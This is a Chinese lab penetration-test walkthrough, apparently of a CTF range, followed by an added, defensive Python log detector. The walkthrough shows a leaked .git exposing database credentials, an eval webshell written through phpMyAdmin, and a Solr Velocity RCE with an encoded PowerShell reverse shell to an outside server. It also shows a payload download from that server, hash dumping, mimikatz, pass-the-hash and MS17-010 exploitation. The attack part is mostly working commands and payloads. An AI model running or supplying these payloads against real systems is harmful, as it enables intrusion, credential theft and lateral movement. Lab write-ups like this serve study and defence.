Information gathering
http://aertyxqdp1.target.yijinglab.com/
dirsearch
dirsearch -u "http://aertyxqdp1.target.yijinglab.com/"
Found:
http://aertyxqdp1.target.yijinglab.com/joomla/
http://aertyxqdp1.target.yijinglab.com/phpMyAdmin/
http://aertyxqdp1.target.yijinglab.com/joomla/.git
Vulnerability discovery
Retrieve the source code with GitHack
python GitHack.py http://aertyxqdp1.target.yijinglab.com/joomla/.git
Source code retrieved:
public $user = 'root';
public $password = 'yijing666mingyyiyeryi666';
public $log_path = 'C:\\phpStudy\\PHPTutorial\\WWW\\Joomla\\administrator/logs';
public $tmp_path = 'C:\\phpStudy\\PHPTutorial\\WWW\\Joomla/tmp';
Exploitation
Log in to phpMyAdmin and write a webshell
show global variables like "secure%";
select '<?php eval($_POST["pwd"]); ?>' into outfile 'C:\\phpStudy\\PHPTutorial\\WWW\\Joomla\\shelld41d8cd98f00b204.php';
Check privileges
Write the webshell
Connect
Information gathering
Windows IP 配置
以太网适配器 本地连接:
连接特定的 DNS 后缀 . . . . . . . : openstacklocal
本地链接 IPv6 地址. . . . . . . . : fe80::4d4:61aa:24be:fb73%11
IPv4 地址 . . . . . . . . . . . . : 172.16.36.63
子网掩码 . . . . . . . . . . . . : 255.255.255.0
默认网关. . . . . . . . . . . . . : 172.16.36.254
隧道适配器 isatap.openstacklocal:
媒体状态 . . . . . . . . . . . . : 媒体已断开
连接特定的 DNS 后缀 . . . . . . . : openstacklocal
whoami
net time /domain
Not in a domain
hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:329153f560eb329c0e1deea55e88a1e9:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
administrator
root
Internal network forwarding
A quick scan with fscan
Upload the proxy
http://aertyxqdp1.target.yijinglab.com/Joomla/ttd41d8cd98f00b204.php
python neoreg.py -u http://aertyxqdp1.target.yijinglab.com/Joomla/ttd41d8cd98f00b204.php -k 123456789
Solr site
Look at the cores
Internal network penetration
Command execution
http://172.16.36.133:8983/solr/test/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27powershell.exe%20-e%20JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAOAAyAC4AMQA1ADcALgAxADcAMwAuADEAMQAyACIALAA1ADAANQA2ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end
On the 82.157.173.112 server:
nc -lvnp 5056
Reverse shell received
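Added example, not part of the original writeup: detection and triage logic for the request shown above, run over web request logs. It flags requests that select the Velocity response writer, marks inline templates that reach Runtime.exec() through reflection, and decodes a `powershell -e` argument to recover the callback address. The log format (NCSA lines, as a Jetty request log writes them), the sample lines and the addresses 198.51.100.7 and 203.0.113.10 are constructed assumptions.

```python
import base64
import re
from urllib.parse import parse_qs, quote, urlsplit

# Assumed log format: NCSA common log lines, as written by a Jetty request log.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
# Strings that show a template reaching Runtime.exec() through Java reflection.
REFLECTION_MARKERS = ("class.forName", "java.lang.Runtime", "getRuntime", ".exec(")
EXEC_RE = re.compile(r"\.exec\(\s*'([^']*)'")
PS_RE = re.compile(r"powershell(?:\.exe)?\s+-(\w+)\s+(\S.*)$", re.I)
ENDPOINT_RE = re.compile(r'"(\d{1,3}(?:\.\d{1,3}){3})"\s*,\s*(\d{1,5})')


def decode_powershell(b64):
    """Decode a -EncodedCommand argument (base64 over UTF-16LE); None if invalid."""
    try:
        raw = base64.b64decode(b64 + "=" * (-len(b64) % 4), validate=True)
        return raw.decode("utf-16-le")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return None


def analyze_line(line):
    """Return a finding for a request that uses the Velocity writer, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, when, _method, target, status = m.groups()
    parts = urlsplit(target)
    params = parse_qs(parts.query)  # also undoes %xx and '+' encoding
    if "velocity" not in (v.lower() for v in params.get("wt", [])):
        return None
    # Inline templates are passed as v.template.<name>=<template body>.
    bodies = [v for k, vs in params.items() if k.startswith("v.template.") for v in vs]
    body = "\n".join(bodies)
    markers = [mk for mk in REFLECTION_MARKERS if mk in body]
    finding = {
        "client": client, "time": when, "path": parts.path, "status": int(status),
        # "review": Velocity writer used; "high": inline template with reflection.
        "severity": "high" if bodies and markers else "review",
        "markers": markers, "command": None, "decoded": None, "endpoints": [],
    }
    cmd = EXEC_RE.search(body)
    if cmd:
        finding["command"] = cmd.group(1)
        ps = PS_RE.search(cmd.group(1))
        flag = ps.group(1).lower() if ps else ""
        # PowerShell accepts any prefix of -EncodedCommand, plus the alias -ec.
        if ps and ("encodedcommand".startswith(flag) or flag == "ec"):
            # Form decoding turns a raw '+' inside base64 into a space; put it back.
            decoded = decode_powershell(ps.group(2).strip().replace(" ", "+"))
            if decoded:
                finding["decoded"] = decoded
                finding["endpoints"] = [f"{ip}:{port}"
                                        for ip, port in ENDPOINT_RE.findall(decoded)]
    return finding


def scan(lines):
    """Analyze every log line and keep the ones that produced a finding."""
    return [f for f in map(analyze_line, lines) if f]


def _constructed_request():
    # Constructed sample: a one-line script fragment naming a documentation address.
    script = '$c = New-Object System.Net.Sockets.TCPClient("203.0.113.10",4444)'
    b64 = base64.b64encode(script.encode("utf-16-le")).decode()
    template = ("#set($x='') #set($rt=$x.class.forName('java.lang.Runtime')) "
                "#set($ex=$rt.getRuntime().exec('powershell.exe -e " + b64 + "'))")
    return ("/solr/test/select?q=1&wt=velocity&v.template=custom"
            "&v.template.custom=" + quote(template))


# Constructed log lines: one suspicious request, one normal query, one request
# that uses the Velocity writer without an inline template.
SAMPLE_LOG = [
    '198.51.100.7 - - [12/Apr/2024:00:10:02 +0000] "GET '
    + _constructed_request() + ' HTTP/1.1" 200 412',
    '172.16.36.20 - - [12/Apr/2024:00:10:05 +0000] '
    '"GET /solr/test/select?q=*:*&wt=json HTTP/1.1" 200 981',
    '172.16.36.20 - - [12/Apr/2024:00:10:09 +0000] '
    '"GET /solr/test/select?q=1&wt=velocity&v.template=browse HTTP/1.1" 200 2290',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["severity"], f["client"], f["path"], f["markers"], f["endpoints"])
```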
Two machines on the same network layer:
172.16.36.63
172.16.36.133 (dual-homed)
Information gathering on 172.16.36.133 reveals the 172.16 segment
Download the msf payload
$p = new-object system.net.webclient
$p.downloadfile("http://82.157.173.112:8081/shell.exe","shell.exe")
Reverse shell
Machine 80 (in the domain)
net time /domain
Upload fscan
Scan 172.16.16.0/24
f.exe -h 172.16.16.0/24 -o r16.txt
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.2
start infoscan
(icmp) Target 172.16.16.1 is alive
(icmp) Target 172.16.16.33 is alive
(icmp) Target 172.16.16.80 is alive
(icmp) Target 172.16.16.189 is alive
[*] Icmp alive hosts len is: 4
172.16.16.80:139 open
172.16.16.189:445 open
172.16.16.33:445 open
172.16.16.80:445 open
172.16.16.189:139 open
172.16.16.33:139 open
172.16.16.189:135 open
172.16.16.80:21 open
172.16.16.189:88 open
172.16.16.80:80 open
172.16.16.33:135 open
172.16.16.80:135 open
172.16.16.80:8983 open
[*] alive ports len is: 13
start vulscan
[*] NetInfo:
[*]172.16.16.189
[->]WIN-MVNE1SFJ0LQ
[->]172.16.16.189
[*] WebTitle: http://172.16.16.80 code:200 len:689 title:IIS7
[+] 172.16.16.80 MS17-010 (Windows 7 Professional 7601 Service Pack 1)
[+] 172.16.16.189 MS17-010 (Windows Server 2012 R2 Standard 9600)
[*] NetInfo:
[*]172.16.16.33
[->]WIN-T02F2T5601J
[->]172.16.16.33
[*] NetBios: 172.16.16.33 WIN-T02F2T5601J.dog.local Windows Server 2016 Standard 14393
[*] WebTitle: http://172.16.16.80:8983 code:302 len:0 title:None 跳转url: http://172.16.16.80:8983/solr/
[*] WebTitle: http://172.16.16.80:8983/solr/ code:200 len:14887 title:Solr Admin
[+] http://172.16.16.80:8983 poc-yaml-solr-velocity-template-rce
已完成 13/13
[*] 扫描结束,耗时: 18.0771485s
In summary:
172.16.16.189 is the domain controller
The domain name is dog.local
net view /domain:dog
The domain also contains the machine 172.16.16.33
Load kiwi on machine 80
kiwi_cmd sekurlsa::logonpasswords
Other passwords obtained
Attacking internal hosts
Pass-the-hash against machine 33
use windows/smb/ms17_010_psexec
set smbuser administrator
set SMBDomain dog.local
set SMBPass aad3b435b51404eeaad3b435b51404ee:e054e61488f2545292d4e5b9f722d9a2
Shell received
Switch the route and pass-the-hash against 189
use exploit/windows/smb/psexec
set SMBUser administrator
set SMBPass aad3b435b51404eeaad3b435b51404ee:e054e61488f2545292d4e5b9f722d9a2
Read the passwords on 189
ipconfig
Passwords from 33
Passwords from 189
kiwi_cmd sekurlsa::logonpasswords
All sessions
flag1
0E089DC1595C3447DD62519756BCC4AC20C807D116065A385200E1A06D5F827486C5C25DCEC68876B07B8B31E416996122DAA05E280DD998396F6EF573A9D40F
flag2
E6B8C928198A4F27CAF809AE6AD48F9A7E56F7CC0632726C4A444DEF3D8C6E76A9918065141F2288DF7A0E790F2B1F4B783C99C7CFF29F0DD7F384CD6014B59F
flag3?
3da8bc4ccded97022b9cb114852a370522a2b9073a884e4e426045c26c18f1361d58dd69e69cf5e82f4a070eb23b5807464d6a0ee3481054ceeb2c775e51e18fe51a638bb72ccbf508462a03279913667c7d9bed48360d4289435614c7b144dcd082ceae5964ac8d168207da18e51ecde71cf8b1bbb8657ad7913e598b9b0b45bd30b09048e0e631e1851d70eb160af7b2dd132cfc3dd70af7704313044b790d44602813ddcb3eae899cf142fb1154659abe2a108257e9d9a8ef4d2ae9850136f83d8d669b6b58ef8654342b9e6ce94dc0a7ec85e7b14e5491afe6d4d98e08e978fff9d045b2b714402c8aa9a96221d2